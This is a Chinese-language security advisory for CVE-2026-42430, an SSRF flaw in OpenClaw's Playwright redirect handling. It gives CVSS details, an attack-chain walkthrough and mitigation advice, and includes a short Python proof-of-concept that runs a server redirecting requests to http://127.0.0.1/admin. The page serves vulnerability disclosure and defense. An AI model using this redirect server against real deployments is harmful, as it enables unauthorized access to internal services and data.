CVE-2026-42430 CVSS 6.5 中危

CVE-2026-42430 OpenClaw SSRF漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42430

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.8之前的版本在Playwright重定向处理逻辑中存在服务端请求伪造（SSRF）漏洞。由于未能正确处理请求时的导航，攻击者可绕过严格的浏览器SSRF安全检查，进而访问本应受限制的内部私有网络目标。该漏洞可能导致敏感信息泄露，对系统机密性构成威胁。

技术细节

该漏洞源于OpenClaw在使用Playwright进行网页自动化操作时，对重定向过程中请求时导航的处理不当。通常情况下，SSRF防护措施会对请求的目标URL进行校验，以拦截对内网地址（如127.0.0.1、10.x.x.x等）的访问。然而，在此漏洞中，攻击者可以通过精心构造的恶意链接，利用Playwright在处理重定向时的行为，绕过初始的URL检查。当Playwright跟随重定向跳转时，可能会访问到受保护的内部元数据端点或私有服务。由于CVSS向量显示需要低权限和用户交互，攻击者通常需要诱导授权用户点击特制链接或访问特定页面才能触发该漏洞，从而实现对内网服务的未授权访问。

攻击链分析

STEP 1

侦察与准备

攻击者识别出OpenClaw实例存在SSRF漏洞，并准备一个恶意重定向服务。

STEP 2

诱导交互

攻击者诱导拥有低权限的用户点击特制链接或在应用中提交包含恶意服务器URL的请求。

STEP 3

触发重定向

OpenClaw使用Playwright请求攻击者提供的URL。恶意服务器返回302重定向响应，指向内部私有地址（如127.0.0.1）。

STEP 4

绕过检查

在Playwright处理重定向导航的过程中，由于漏洞存在，SSRF防护机制未能拦截对内部地址的访问请求。

STEP 5

达成访问

OpenClaw成功请求内部私有目标，攻击者借此获取敏感信息或进一步探测内网结构。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import http.server
import socketserver

# Malicious server to redirect to internal target (SSRF PoC)
class RedirectHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Redirect to a restricted internal address (e.g., localhost admin panel)
        self.send_response(302)
        self.send_header('Location', 'http://127.0.0.1/admin')
        self.end_headers()

PORT = 8000
with socketserver.TCPServer(('', PORT), RedirectHandler) as httpd:
    print(f"PoC server running at port {PORT}")
    # Attacker sends the URL of this server to the vulnerable OpenClaw instance
    httpd.serve_forever()

影响范围

OpenClaw < 2026.4.8

防御指南

临时缓解措施

建议立即限制OpenClaw应用服务器的出站网络访问，仅允许必要的公网通信，阻断对RFC 1918定义的私有网段及本地回环地址的访问。在无法立即升级的情况下，应暂时禁用涉及Playwright重定向处理的相关功能模块。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表